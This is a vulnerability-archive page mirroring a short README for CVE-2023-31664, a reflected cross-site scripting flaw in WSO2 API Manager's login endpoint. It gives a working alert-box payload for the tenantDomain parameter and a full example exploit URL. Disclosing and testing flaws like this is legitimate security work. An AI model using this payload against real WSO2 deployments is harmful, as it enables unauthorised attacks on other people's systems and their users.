Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2023-31664 PoC — WSO2 API Manager 跨站脚本漏洞

Source
https://github.com/adilkhan7/CVE-2023-31664
Associated Vulnerability
Title:WSO2 API Manager 跨站脚本漏洞 (CVE-2023-31664)
Description:A reflected cross-site scripting (XSS) vulnerability in /authenticationendpoint/login.do of WSO2 API Manager before 4.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tenantDomain parameter.
Description
CVE-2023-31664 WSO2
Readme
# CVE-2023-31664
CVE-2023-31664 
A reflected cross-site scripting (XSS) vulnerability in /authenticationendpoint/login.do of WSO2 Api Manager below v4.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tenantDomain parameter.

PoC: to exploit it only needs change the value of tenantDomain parameter from super.carbon to </script><script>alert(document.domain)</script>

Example: 
https://host/authenticationendpoint/login.do?client_id=..TRUNCATED...+openid&state=%2F&tenantDomain=</script><script>alert(document.domain)</script>&sessionDataKey=00000000000&relyingParty=AaAaAaAaA&type=oidc&sp=apim_admin_portal&isSaaSApp=true&authenticators=BasicAuthenticator 

Reported by: na1man
File Snapshot

 [4.0K]  /data/pocs/373eaff079246b6e8bf710816d119b09b8cd8090
└── [ 735]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →